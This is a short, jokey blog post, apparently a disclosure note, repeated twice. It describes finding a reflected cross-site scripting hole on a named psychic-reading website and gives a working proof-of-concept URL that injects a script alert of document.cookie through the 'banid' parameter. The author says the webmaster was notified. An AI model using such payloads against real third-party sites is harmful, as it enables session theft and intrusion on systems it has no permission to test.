Forgive me in advance for an extremely bad joke, if you can even call it that, but I just can't help it.
Here's how to get an XSS fortune cookie:
1) Ask the mighty Google oracle who might be able to tell you your fortune.
http://www.google.com/search?hl=en&q=tell+my+fortune&btnG=Search&lr=lang_en
2) Select one of the sponsored links; in this case I chose SpritualExperts.com.
3) Pick a variable. I settled for banid.
4) Ask it if it has a cookie for you.
http://www.spiritualexperts.com/psychic_reading/psychic_reading.asp?banid=%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E
Voila...an XSS fortune cookie. Sorry. Really, I am.
The webmaster has been advised...play nice.
Screenshot for after they fix the issue.
del.icio.us | digg
Here's how to get an XSS fortune cookie:
1) Ask the mighty Google oracle who might be able to tell you your fortune.
http://www.google.com/search?hl=en&q=tell+my+fortune&btnG=Search&lr=lang_en
2) Select one of the sponsored links; in this case I chose SpritualExperts.com.
3) Pick a variable. I settled for banid.
4) Ask it if it has a cookie for you.
http://www.spiritualexperts.com/psychic_reading/psychic_reading.asp?banid=%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E
Voila...an XSS fortune cookie. Sorry. Really, I am.
The webmaster has been advised...play nice.
Screenshot for after they fix the issue.
del.icio.us | digg
